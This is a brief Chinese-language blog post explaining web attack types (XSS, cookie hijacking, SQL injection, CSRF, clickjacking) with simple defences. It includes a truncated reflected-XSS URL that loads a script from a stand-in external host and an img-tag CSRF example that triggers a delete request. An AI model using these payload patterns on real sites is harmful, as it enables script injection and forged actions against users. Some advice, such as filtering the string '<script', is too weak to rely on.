javascript安全攻击类型


1: XSS(cross site Script)
XSS的类型:
1: get型
指诱导用户打开一个url,这个url的片段标志符是执行一段下载恶意攻击的js文件的js代码,例如
http://hehe.com/hehe.html?nam… src=http://haha.com/xxs.js>&lt…
防御:
2: post型
在表单提交的时候,在类似于富文本框之类的地方输入一段恶意的js代码。
防御:对表单提交的内容做格式检查和关键字过滤,比如:

1: 邮箱必须是邮箱的格式,名字只能是字母。。。
2: 富文本框过滤特殊符号‘<script’之类的

3: Cookie劫持
一般Cookie存放着一些重要的信息,例如客户的登陆信息,如果Cookie被劫持,那就暴露了用户信息,更严重的是攻击者可以用此登陆被害人的账号。

2: SQL注入
指客户可以向服务器提交一段SQL代码。
预防:

1: 做表单验证,过滤特殊字符

3: 跨站请求伪造(CSRF:Cross Site Request Forgery)
指B站的攻击者可以得到在A站某个请求的所有参数,在B站发起一个属于A站的请求,这就是跨站请求。例如:
GET http://a.com/item/delete?id=1
客户登陆了A站,然后又去访问B站,在B站请求了一张图片
<img src=”http://a.com/item/delete?id=1…
这时候受害者在不知道的情况下发起了一个删除请求。
防御:

每一个请求都加一个token,服务器端对每个请求都验证token。

4: 点击劫持(ClickJacking)
用一个透明的iframe覆盖在网页上,欺骗客户在这个iframe上操作。解决的办法是从根源上解决,也就是条件式地允许iframe的嵌入。在HTTP头:X-Frame-Options设置自己想要的值:

DENY:禁止任何页面的frame加载;
SAMEORIGIN:只有同源页面的frame可加载;
ALLOW-FROM:可定义允许frame加载的页面地址。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>